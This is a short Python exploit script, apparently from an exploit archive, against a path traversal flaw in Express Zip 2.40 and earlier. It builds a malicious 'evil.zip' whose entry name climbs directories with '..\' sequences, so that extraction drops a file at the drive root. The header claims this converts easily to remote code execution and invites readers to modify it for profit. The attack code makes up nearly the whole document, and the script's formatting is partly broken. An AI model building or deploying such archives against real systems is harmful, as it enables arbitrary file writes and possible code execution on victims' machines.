#!/usr/bin/python -w
# Title : Express Zip <= 2.40 Path Traversal
# Date : 07/04/2016
# Author : R-73eN
# Tested on : Windows Xp / Windows 7 Ultimate
# Software Link : http://www.nchsoftware.com/zip/
# Download Link: http://www.nchsoftware.com/zip/zipplus.exe
# Vulnerable Versions : Express Zip <= 2.40
# Express Zip doesn't validates " ..\ " which makes possible
# to do a path traversal attack which can be converted easily to RCE
# How to Reproduce:
# 1- Run Exploit
# 2- Right Click evil.zip go to Express Zip and click Extract Here
# 3- File will be extracted to the root of the partition in this case C:\POC.txt
# This quick and dirt code is written only for demonstration purposes.
# If you wanna profit from it you must modify it.
# Video: https://www.youtube.com/watch?v=kb43h8Hoo0o
banner = ""
banner += "_________ __\n"
banner +=" |_ _|_ __/ _| ___/ ___| ___ _ __/ \| |\n"
banner +="| || '_ \| |_ / _ \| |_ / _ \ '_ \/ _ \ | |\n"
banner +="| || | | |_| (_) | |_| |__/ | | |/ ___ \| |___ \n"
banner +=" |___|_| |_|_|\___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
print banner
import zipfile, sys
if(len(sys.argv) != 2):
print "[+] Usage : python exploit.py file_to_do_the_traversal [+]"
print "[+] Example: python exploit.py test.txt"
print "[+] Creating Zip File [+]"
zf = zipfile.ZipFile("evil.zip", "w")
zf.write(sys.argv[1], "..\\..\\..\\..\\..\\..\\..\\..\\POC.txt")
print "[+] Created evil.zip successfully [+]"